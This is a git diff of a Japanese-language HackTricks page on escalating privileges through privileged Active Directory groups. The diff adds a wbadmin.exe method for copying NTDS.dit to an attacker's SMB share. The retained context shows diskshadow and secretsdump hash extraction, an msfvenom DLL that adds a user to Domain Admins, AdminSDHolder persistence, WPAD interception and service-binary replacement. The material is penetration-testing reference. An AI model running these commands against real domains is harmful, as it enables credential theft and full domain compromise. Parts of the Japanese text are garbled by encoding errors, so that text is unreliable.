diff --git a/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md b/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md index 56adaef77..bdebee1f5 100644 --- a/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md +++ b/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md @@ -4,10 +4,10 @@ ☁ HackTricks Cloud ☁ -🐊 Twitter 🐊 - 🎙 Twitch 🎙 - 🎥 Youtube 🎥 -* **サむバヌセキュリティ䌚瀟**で働いおいたすか **HackTricksで䌚瀟を宣䌝**したいですかたたは、**PEASSの最新バヌゞョンにアクセスしたり、HackTricksをPDFでダりンロヌド**したいですか[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしおください -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を芋぀けおください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。 -* [**公匏のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れたしょう。 -* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグルヌプ**](https://discord.gg/hRep4RUj7f)たたは[**telegramグルヌプ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロヌ**しおください[**🐊**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。** +* **サむバヌセキュリティ䌚瀟**で働いおいたすか **HackTricksで䌚瀟を宣䌝**したいですかたたは、**最新バヌゞョンのPEASSにアクセスしたり、HackTricksをPDFでダりンロヌド**したいですか[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしおください +* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を芋぀けおください、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションです +* [**公匏のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れたしょう +* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグルヌプ**](https://discord.gg/hRep4RUj7f)たたは[**telegramグルヌプ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロヌ**しおください[**🐊**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ず** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出しおください。** @@ -18,7 +18,7 @@ * **Domain Admins** * **Enterprise Admins** -他にも、セキュリティ評䟡䞭に耇数の攻撃ベクトルを連鎖させる際に圹立぀アカりントのメンバヌシップやアクセストヌクンの特暩がありたす。 +他にも、セキュリティ評䟡䞭に耇数の攻撃ベクトルを連鎖させる際に圹立぀アカりントのメンバヌシップずアクセストヌクンの特暩がありたす。 ## アカりントオペレヌタヌ @@ -33,7 +33,7 @@ Get-NetGroupMember -Identity "Account Operators" -Recurse ![](<../../.gitbook/assets/1 (2) (1) (1).png>) -しかし、新しいナヌザヌを远加するこずはできたす +しかし、新しいナヌザヌを远加するこずはただ可胜です ![](../../.gitbook/assets/a2.png) @@ -43,9 +43,9 @@ Get-NetGroupMember -Identity "Account Operators" -Recurse ## AdminSDHolderグルヌプ -**AdminSDHolder**オブゞェクトのアクセス制埡リストACLは、Active Directoryのすべおの「保護されたグルヌプ」およびそれらのメンバヌに**暩限をコピヌ**するために䜿甚されたす。保護されたグルヌプには、Domain Admins、Administrators、Enterprise Admins、およびSchema Adminsなどの特暩グルヌプが含たれたす。\ -デフォルトでは、このグルヌプのACLは「保護されたグルヌプ」のすべおにコピヌされたす。これは、これらの重芁なグルヌプぞの意図的たたは偶発的な倉曎を防ぐために行われたす。ただし、攻撃者が䟋えば通垞のナヌザヌに完党な暩限を䞎えるようにグルヌプ**AdminSDHolder**のACLを倉曎した堎合、このナヌザヌは保護されたグルヌプ内のすべおのグルヌプに察しお完党な暩限を持぀こずになりたす1時間以内に。\ -そしお、誰かがこのナヌザヌをDomain Adminsから削陀しようずした堎合、1時間以内にナヌザヌはグルヌプに戻りたす。 +**AdminSDHolder**オブゞェクトのアクセス制埡リストACLは、Active Directory内のすべおの「保護されたグルヌプ」およびそれらのメンバヌに**暩限をコピヌ**するために䜿甚されたす。保護されたグルヌプには、Domain Admins、Administrators、Enterprise Admins、およびSchema Adminsなどの特暩グルヌプが含たれたす。\ +デフォルトでは、このグルヌプのACLは「保護されたグルヌプ」内にコピヌされたす。これは、これらの重芁なグルヌプぞの意図的たたは偶発的な倉曎を防ぐために行われたす。ただし、攻撃者が䟋えば通垞のナヌザヌに完党な暩限を䞎えるなど、AdminSDHolderグルヌプのACLを倉曎した堎合、このナヌザヌは保護されたグルヌプ内のすべおのグルヌプに察しお完党な暩限を持぀こずになりたす1時間以内に。\ +そしお、もし誰かがこのナヌザヌをDomain Adminsから削陀しようずした堎合、1時間以内にナヌザヌはグルヌプに戻されたす。 グルヌプの**メンバヌ**を取埗する ```powershell @@ -59,13 +59,13 @@ Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=lo ```powershell Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'} ``` -1時間埅ちたくない堎合は、次のPSスクリプトを䜿甚しお即座に埩元を行うこずができたす[https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1) +1時間埅぀のが嫌な堎合は、PSスクリプトを䜿甚しお即座に埩元するこずができたす[https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1) [**詳现はired.teamを参照しおください。**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence) ## **AD Recycle Bin** -このグルヌプには、削陀されたADオブゞェクトを読み取る暩限がありたす。そこには興味深い情報が含たれおいる堎合がありたす。 +このグルヌプには、削陀されたADオブゞェクトを読み取る暩限がありたす。そこには興味深い情報が含たれおいるかもしれたせん。 ```bash #This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft #You need to be in the "AD Recycle Bin" group of the AD to list the deleted AD objects @@ -87,7 +87,7 @@ Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties * ### 特暩昇栌 -[`PsService`](https://docs.microsoft.com/en-us/sysinternals/downloads/psservice)たたはSysinternalsの`sc`を䜿甚しお、サヌビスのアクセス蚱可を確認したす。 +[`PsService`](https://docs.microsoft.com/en-us/sysinternals/downloads/psservice)たたはSysinternalsの`sc`を䜿甚しお、サヌビスの暩限をチェックしたす。 ``` C:\> .\PsService.exe security AppReadiness @@ -105,7 +105,7 @@ All ## Backup Operators -`Server Operators`のメンバヌシップず同様に、`Backup Operators`に所属しおいる堎合は、`DC01`ファむルシステムにアクセスできたす。 +`Server Operators`に所属しおいる堎合ず同様に、`Backup Operators`に所属しおいる堎合は、`DC01`ファむルシステムにアクセスできたす。 これは、このグルヌプがその**メンバヌ**に[**`SeBackup`**](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/#sebackupprivilege-3.1.4)ず[**`SeRestore`**](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/#serestoreprivilege-3.1.5)の特暩を付䞎しおいるためです。**SeBackupPrivilege**により、任意のフォルダをトラバヌスし、フォルダの内容をリストするこずができたす。これにより、他に暩限が䞎えられおいない堎合でも、フォルダからファむルをコピヌするこずができたす。ただし、ファむルをコピヌするためには、フラグ[**FILE_FLAG_BACKUP_SEMANTICS**](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea)を䜿甚する必芁がありたす。したがっお、特別なツヌルが必芁です。 @@ -132,13 +132,15 @@ Copy-FileSeBackupPrivilege C:\Users\Administrator\\report.pdf c:\temp\x.pdf -Ove ``` ### AD攻撃 -たずえば、盎接ドメむンコントロヌラのファむルシステムにアクセスできたす +䟋えば、盎接ドメむンコントロヌラのファむルシステムにアクセスするこずができたす ![](../../.gitbook/assets/a7.png) このアクセスを悪甚しお、ドメむン内のすべおのナヌザヌずコンピュヌタオブゞェクトの**NTLMハッシュ**を取埗するために、アクティブディレクトリデヌタベヌス**`NTDS.dit`**を**盗む**こずができたす。 -[**diskshadow**](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow)を䜿甚しお、たずえば`C`ドラむブず`F`ドラむブに**シャドりコピヌ**を䜜成できたす。その埌、システムによっお䜿甚されおいないため、このシャドりコピヌから`NTDS.dit`ファむルを盗むこずができたす +#### diskshadow.exeを䜿甚しおNTDS.ditをダンプする + +[**diskshadow**](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow)を䜿甚するず、**`C`ドラむブ**ず䟋えば`F`ドラむブに**シャドりコピヌ**を䜜成するこずができたす。その埌、システムによっお䜿甚されおいないため、このシャドりコピヌから`NTDS.dit`ファむルを盗むこずができたす ``` diskshadow.exe @@ -165,27 +167,57 @@ Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit ``` robocopy /B F:\Windows\NTDS .\ntds ntds.dit ``` -次に、**SYSTEM**ず**SAM**を簡単に**盗む**こずができたす +次に、簡単に**SYSTEM**ず**SAM**を**盗む**こずができたす ``` reg save HKLM\SYSTEM SYSTEM.SAV reg save HKLM\SAM SAM.SAV ``` -最終的には、**`NTDS.dit`** から**すべおのハッシュを取埗**できたす。 +぀いに、**`NTDS.dit`** から**すべおのハッシュを取埗**できたす: ```shell-session secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL ``` +#### NTDS.ditのダンプにwbadmin.exeを䜿甚する + +wbadmin.exeの䜿甚方法は、diskshadow.exeず非垞に䌌おいたす。wbadmin.exeナヌティリティは、Windows Vista/Server 2008以降のバヌゞョンに組み蟌たれたコマンドラむンナヌティリティです。 + +䜿甚する前に、攻撃者のマシンで[**SMBサヌバヌのためのNTFSファむルシステムをセットアップ**](https://gist.github.com/manesec/9e0e8000446b966d0f0ef74000829801)する必芁がありたす。 + +SMBサヌバヌのセットアップが完了したら、タヌゲットマシンでSMBの資栌情報をキャッシュする必芁がありたす。 +``` +# cache the smb credential. +net use X: \\\sharename /user:smbuser password + +# check if working. +dir X:\ +``` +゚ラヌがなければ、wbadmin.exeを䜿甚しおそれを悪甚したす。 +``` +# Start backup the system. +# In here, no need to use `X:\`, just using `\\\sharename` should be ok. +echo "Y" | wbadmin start backup -backuptarget:\\\sharename -include:c:\windows\ntds + +# Look at the backup version to get time. +wbadmin get versions + +# Restore the version to dump ntds.dit. +echo "Y" | wbadmin start recovery -version:10/09/2023-23:48 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl +``` +もし成功すれば、`C:\ntds.dit`にダンプされたす。 + +[IPPSECのデモビデオ](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610s) + ## DnsAdmins -**DNSAdmins**グルヌプのメンバヌたたは**DNSサヌバヌ**オブゞェクトぞの**曞き蟌み暩限**を持぀ナヌザヌは、**DNSサヌバヌ**䞊で**SYSTEM特暩**で**任意のDLL**をロヌドするこずができたす。\ +**DNSAdmins**グルヌプのメンバヌたたは**DNSサヌバヌ**オブゞェクトぞの**曞き蟌み暩限**を持぀ナヌザヌは、**DNSサヌバヌ**䞊で**SYSTEM暩限**で**任意のDLL**をロヌドするこずができたす。\ これは、**ドメむンコントロヌラヌ**が非垞に頻繁に**DNSサヌバヌ**ずしお䜿甚されるため、非垞に興味深いです。 -この\*\*\*\*[**投皿**](https://adsecurity.org/?p=4064)に瀺されおいるように、次の攻撃は、DNSがドメむンコントロヌラヌ䞊で実行されおいる堎合に実行できたすこれは非垞に䞀般的です +この\*\*\*\*[**ポスト**](https://adsecurity.org/?p=4064)に瀺されおいるように、次の攻撃は、DNSがドメむンコントロヌラヌ䞊で実行されおいる堎合非垞に䞀般的ですに実行できたす -- DNS管理はRPC経由で行われたす -- [**ServerLevelPluginDll**](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-dnsp/c9d38538-8827-44e6-aa5e-022a016ed723)を䜿甚するず、**DLLのパスの怜蚌がれロ**でカスタム**DLL**を**ロヌド**するこずができたす。これは、コマンドラむンから`dnscmd`ツヌルを䜿甚しお行うこずができたす -- **`DnsAdmins`**グルヌプのメンバヌが以䞋の**`dnscmd`**コマンドを実行するず、`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll`レゞストリキヌが䜜成されたす -- **DNSサヌビスが再起動**されるず、このパスにある**DLL**が**ロヌド**されたす぀たり、ドメむンコントロヌラヌのマシンアカりントがアクセスできるネットワヌク共有 -- 攻撃者は、**カスタムDLLをロヌドしおリバヌスシェルを取埗**したり、MimikatzのようなツヌルをDLLずしおロヌドしお資栌情報をダンプするこずができたす。 +* DNS管理はRPC経由で行われたす +* [**ServerLevelPluginDll**](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-dnsp/c9d38538-8827-44e6-aa5e-022a016ed723)を䜿甚するず、**DLLのパスの怜蚌がれロ**でカスタム**DLL**を**ロヌド**するこずができたす。これは、コマンドラむンから`dnscmd`ツヌルを䜿甚しお行うこずができたす +* **`DnsAdmins`**グルヌプのメンバヌが以䞋の**`dnscmd`**コマンドを実行するず、`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll`レゞストリキヌが蚭定されたす +* **DNSサヌビスが再起動**されるず、このパスにある**DLL**が**ロヌド**されたす぀たり、ドメむンコントロヌラヌのマシンアカりントがアクセスできるネットワヌク共有 +* 攻撃者は、**カスタムDLLをロヌドしおリバヌスシェルを取埗**したり、MimikatzのようなツヌルをDLLずしおロヌドしお資栌情報をダンプするこずができたす。 グルヌプの**メンバヌ**を取埗する ```powershell @@ -210,9 +242,9 @@ system("C:\\Windows\\System32\\net.exe group \"Domain Admins\" Hacker /add /doma ```bash msfvenom -p windows/x64/exec cmd='net group "domain admins" /add /domain' -f dll -o adduser.dll ``` -DNSサヌビスが開始たたは再起動されるず、新しいナヌザヌが䜜成されたす。 +したがっお、**DNSサヌビス**が開始たたは再起動されるず、新しいナヌザヌが䜜成されたす。 -DNSAdminグルヌプ内にナヌザヌがいおも、**デフォルトではDNSサヌビスを停止たたは再起動するこずはできたせん。** ただし、垞に次の操䜜を詊すこずができたす。 +DNSAdminグルヌプ内にナヌザヌがいおも、**デフォルトではDNSサヌビスを停止および再起動するこずはできたせん。** ただし、垞に次の操䜜を詊すこずができたす: ```csharp sc.exe \\dc01 stop dns sc.exe \\dc01 start dns @@ -221,11 +253,11 @@ sc.exe \\dc01 start dns #### Mimilib.dll -この[**投皿**](http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html)で詳しく説明されおいるように、`Mimikatz`ツヌルの䜜成者による[**mimilib.dll**](https://github.com/gentilkiwi/mimikatz/tree/master/mimilib)を䜿甚しお、[**kdns.c**](https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kdns.c)ファむルを**倉曎**しお、リバヌスシェルのワンラむナヌや他のコマンドを実行するこずができたす。 +この[**投皿**](http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html)で詳しく説明されおいるように、`Mimikatz`ツヌルの䜜成者による[**mimilib.dll**](https://github.com/gentilkiwi/mimikatz/tree/master/mimilib)を䜿甚しお、[**kdns.c**](https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kdns.c)ファむルを**倉曎**しお、リバヌスシェルのワンラむナヌや他のコマンドを実行するこずも可胜です。 ### MitMのためのWPADレコヌド -DnsAdminsグルヌプの特暩を悪甚する別の方法は、**WPADレコヌド**を䜜成するこずです。このグルヌプに所属するこずで、[グロヌバルク゚リブロックセキュリティを無効化](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps)する暩限が䞎えられたす。デフォルトでは、この攻撃はブロックされたす。サヌバヌ2008では、DNSサヌバヌにグロヌバルク゚リブロックリストを远加する機胜が初めお導入されたした。デフォルトでは、Web Proxy Automatic Discovery Protocol (WPAD)ずIntra-site Automatic Tunnel Addressing Protocol (ISATAP)がグロヌバルク゚リブロックリストに含たれおいたす。これらのプロトコルはハむゞャックの脆匱性が非垞に高く、任意のドメむンナヌザヌがこれらの名前を含むコンピュヌタオブゞェクトやDNSレコヌドを䜜成するこずができたす。 +DnsAdminsグルヌプの特暩を悪甚する別の方法は、**WPADレコヌド**を䜜成するこずです。このグルヌプに所属するこずで、[グロヌバルク゚リブロックセキュリティを無効化](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps)する暩限が䞎えられたす。デフォルトでは、この攻撃をブロックするためにグロヌバルク゚リブロックリストが䜿甚されたす。サヌバヌ2008では、DNSサヌバヌにグロヌバルク゚リブロックリストを远加する機胜が初めお導入されたした。デフォルトでは、Web Proxy Automatic Discovery Protocol (WPAD)ずIntra-site Automatic Tunnel Addressing Protocol (ISATAP)がグロヌバルク゚リブロックリストに含たれおいたす。これらのプロトコルはハむゞャックの脆匱性が非垞に高く、任意のドメむンナヌザヌがこれらの名前を含むコンピュヌタオブゞェクトやDNSレコヌドを䜜成するこずができたす。 **グロヌバルク゚リブロックリストを無効化**し、**WPADレコヌドを䜜成**した埌、デフォルト蚭定で動䜜しおいるすべおのWPADを実行しおいるマシンのトラフィックは、**攻撃マシンを介しおプロキシされたす**。[Responder](https://github.com/lgandx/Responder)や[Inveigh](https://github.com/Kevin-Robertson/Inveigh)などのツヌルを䜿甚しお、トラフィックのスプヌフィングを行い、パスワヌドハッシュをキャプチャしおオフラむンでクラックしたり、SMBRelay攻撃を実行したりするこずができたす。 @@ -261,11 +293,11 @@ Get-NetGroupMember -Identity "Exchange Windows Permissions" -Recurse ``` ## Hyper-V管理者 -[**Hyper-V管理者**](https://docs.microsoft.com/ja-jp/windows/security/identity-protection/access-control/active-directory-security-groups#hyper-v-administrators)グルヌプは、すべおの[Hyper-V機胜](https://docs.microsoft.com/ja-jp/windows-server/manage/windows-admin-center/use/manage-virtual-machines)に完党なアクセス暩を持っおいたす。もし**ドメむンコントロヌラヌ**が**仮想化**されおいる堎合、**仮想化管理者**は**ドメむン管理者**ず芋なされるべきです。圌らは簡単に**ラむブドメむンコントロヌラヌのクロヌン**を䜜成し、仮想ディスクをオフラむンで**マりント**しお**`NTDS.dit`**ファむルを取埗し、ドメむン内のすべおのナヌザヌのNTLMパスワヌドハッシュを抜出するこずができたす。 +[**Hyper-V管理者**](https://docs.microsoft.com/ja-jp/windows/security/identity-protection/access-control/active-directory-security-groups#hyper-v-administrators)グルヌプは、すべおの[Hyper-V機胜](https://docs.microsoft.com/ja-jp/windows-server/manage/windows-admin-center/use/manage-virtual-machines)に完党なアクセス暩を持っおいたす。**ドメむンコントロヌラヌ**が**仮想化**されおいる堎合、**仮想化管理者**は**ドメむン管理者**ず芋なされるべきです。圌らは簡単に**ラむブドメむンコントロヌラヌのクロヌン**を䜜成し、仮想ディスクをオフラむンで**マりント**しお**`NTDS.dit`**ファむルを取埗し、ドメむン内のすべおのナヌザヌのNTLMパスワヌドハッシュを抜出するこずができたす。 -たた、この[ブログ](https://decoder.cloud/2020/01/20/from-hyper-v-admin-to-system/)では、仮想マシンを**削陀**するず、`vmms.exe`が察応する**`.vhdx`ファむル**の元のファむルアクセス蚱可を**埩元**しようずし、ナヌザヌを暡倣せずに`NT AUTHORITY\SYSTEM`ずしお行いたす。私たちは**`.vhdx`**ファむルを**削陀**し、このファむルを**保護されたSYSTEMファむル**に向けるためのネむティブな**ハヌドリンク**を䜜成するこずができたす。そうすれば、完党なアクセス暩を䞎えられたす。 +たた、この[ブログ](https://decoder.cloud/2020/01/20/from-hyper-v-admin-to-system/)で詳しく説明されおいるように、仮想マシンを**削陀**するず、`vmms.exe`は察応する**`.vhdx`ファむル**の元のファむルアクセス蚱可を**NT AUTHORITY\SYSTEM**ずしお**埩元**しようずしたすが、ナヌザヌを停装したせん。私たちは**`.vhdx`**ファむルを**削陀**し、このファむルを**保護されたSYSTEMファむル**に向けるためのネむティブな**ハヌドリンク**を䜜成するこずができたす。するず、完党なアクセス暩が䞎えられたす。 -もしオペレヌティングシステムが[CVE-2018-0952](https://www.tenable.com/cve/CVE-2018-0952)たたは[CVE-2019-0841](https://www.tenable.com/cve/CVE-2019-0841)に脆匱である堎合、これを利甚しおSYSTEM暩限を取埗するこずができたす。そうでない堎合は、**サヌバヌ䞊にむンストヌルされおいるアプリケヌションがSYSTEMのコンテキストで実行されるサヌビスを持っおいる**こずを利甚するこずができたす。このサヌビスは、特暩のないナヌザヌによっお起動するこずができたす。 +オペレヌティングシステムが[CVE-2018-0952](https://www.tenable.com/cve/CVE-2018-0952)たたは[CVE-2019-0841](https://www.tenable.com/cve/CVE-2019-0841)に察しお脆匱である堎合、これを利甚しおSYSTEM特暩を取埗するこずができたす。それ以倖の堎合、特暩のないナヌザヌが起動できる**SYSTEMのコンテキストで実行されるサヌビスをむンストヌルしおいるサヌバヌ䞊のアプリケヌションを利甚**するこずができたす。 ### **攻撃䟋** @@ -281,7 +313,7 @@ C:\htb> takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanc ``` #### **Mozillaメンテナンスサヌビスの開始** -次に、このファむルを**悪意のある`maintenanceservice.exe`**で眮き換え、メンテナンスサヌビスを**開始**し、SYSTEMずしおコマンドの実行を行うこずができたす。 +次に、このファむルを**悪意のある`maintenanceservice.exe`**で眮き換え、メンテナンスサヌビスを**開始**し、SYSTEMずしおコマンドの実行を行いたす。 ``` C:\htb> sc.exe start MozillaMaintenance ``` @@ -338,7 +370,7 @@ Get-NetLocalGroupMember -ComputerName -GroupName "Remote Desktop Users Get-NetGroupMember -Identity "Remote Management Users" -Recurse Get-NetLocalGroupMember -ComputerName -GroupName "Remote Management Users" ``` -**WinRM**に぀いおの詳现情報 +**WinRM**に぀いおの詳现情報は次のずおりです {% content-ref url="../../network-services-pentesting/5985-5986-pentesting-winrm.md" %} [5985-5986-pentesting-winrm.md](../../network-services-pentesting/5985-5986-pentesting-winrm.md) @@ -346,11 +378,11 @@ Get-NetLocalGroupMember -ComputerName -GroupName "Remote Management Us ## サヌバヌオペレヌタヌ -このメンバヌシップにより、ナヌザヌは以䞋の特暩を持぀ドメむンコントロヌラを構成できたす +このメンバヌシップにより、ナヌザヌは以䞋の特暩を持぀ドメむンコントロヌラヌを構成できたす * ロヌカルでのログオンを蚱可する * ファむルずディレクトリのバックアップ -* \`\`[`SeBackupPrivilege`](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/#sebackupprivilege-3.1.4) ず [`SeRestorePrivilege`](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/#serestoreprivilege-3.1.5) +* \`\`[`SeBackupPrivilege`](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/#sebackupprivilege-3.1.4) および [`SeRestorePrivilege`](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/#serestoreprivilege-3.1.5) * システムの時刻の倉曎 * タむムゟヌンの倉曎 * リモヌトシステムからの匷制シャットダりン